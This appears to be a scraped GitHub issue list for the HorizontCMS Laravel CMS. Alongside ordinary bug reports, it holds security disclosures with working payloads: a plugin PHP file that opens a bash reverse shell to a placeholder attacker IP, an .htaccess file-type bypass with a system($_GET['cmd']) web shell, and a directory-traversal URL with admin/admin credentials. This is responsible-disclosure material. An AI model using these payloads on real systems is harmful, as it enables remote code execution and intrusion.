ttimot24 / horizontcms Goto Github PK
View Code? Open in Web Editor NEWLightweight CMS built on Laravel 9, VueJs 2.6 and Bootstrap 5.3. An alternative platform to OctoberCMS
License: MIT License
Lightweight CMS built on Laravel 9, VueJs 2.6 and Bootstrap 5.3. An alternative platform to OctoberCMS
License: MIT License
One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.
<?php
$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp/<Attacker IP>/9001 0>&1'");
return [
'successfully_added_location' => $shell, //'Location added succesfully!',
'successfully_deleted_location' => 'Location deleted succesfully!',
'successfully_set_center' => 'Location is successfully set as map center!'
];
Modifying the message.php file in the sample GoogleMaps plugin file:
Zip and upload the GoogleMaps plugin:
$ zip -r google.zip GoogleMaps
Install --> Activate --> Google Maps Plugin is created in the menu bar:
Add location --> Click Save (to initiate the message.php code)
Please let us know if you have any questions or need further information. Thanks.
Daniel Min & Chi Tran
Under Media > Header Images I have added two pictures to the "Currently on the slider:" but encountered two issue:
Dear Ttimot24,
thank you very much for working on the CMS, I would like to see the features you have build by following your links:
Frontend: https://horizontcms.herokuapp.com/
Backend: https://horizontcms.herokuapp.com/admin
Unfortunately that leads only to a installation page and I'm not aware of your MySQL settings,....
Thank you for having a look.
The youtube part working well with youtube.com links but when I accidentally add a youtu.be link the whole Youtube part dies and can only see a exception when clicking on the menu. Only way to revert this is to delete the bad link from DB.
One who is able to log into the admin panel can gain Remote Code Execution via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE.
AddType application/x-httpd-php .hello
<?php system($_GET['cmd']); ?>
Please let us know if you have any questions or need further information. Thanks!
Daniel Min & Chi Tran
Themes upload function will allow uploading zip file and extract content to /themes/ directory.
If attacker send a zip file contain malicious php, they can executing the PHP file with http://URL/themes/malicious.php
The demo is not opening. If this project is managed properly, this will be a hit in no time. I opened this project just because it says "Alternative to octobercms"
It is really hard to adjust the banner to the header and there is no info on what should be the header image size in ideal cases.
Please add a message/validation if I am adding big pictures for a blog post (which can mess up the page layout) or create and option where I can resize the image (manually or automatically).
Where can i find the home blade and the admin blades !!
Plugins won't show browse server.
Hey there!
I belong to an open source security research community, and a member (@dota-st) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Under Pages > Page list when you click on the "Order" button it creates a Order column on every click. None of these added order columns are functioning, so the whole order function is not working.
The File Manager has vulnerable with Directory traversal. PoC link:
http://horizontcms.herokuapp.com/admin/file-manager/index?path=/../../../../../&mode=embed&CKEditor=editor&CKEditorFuncNum=1&langCode=en
username: admin
password: admin
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.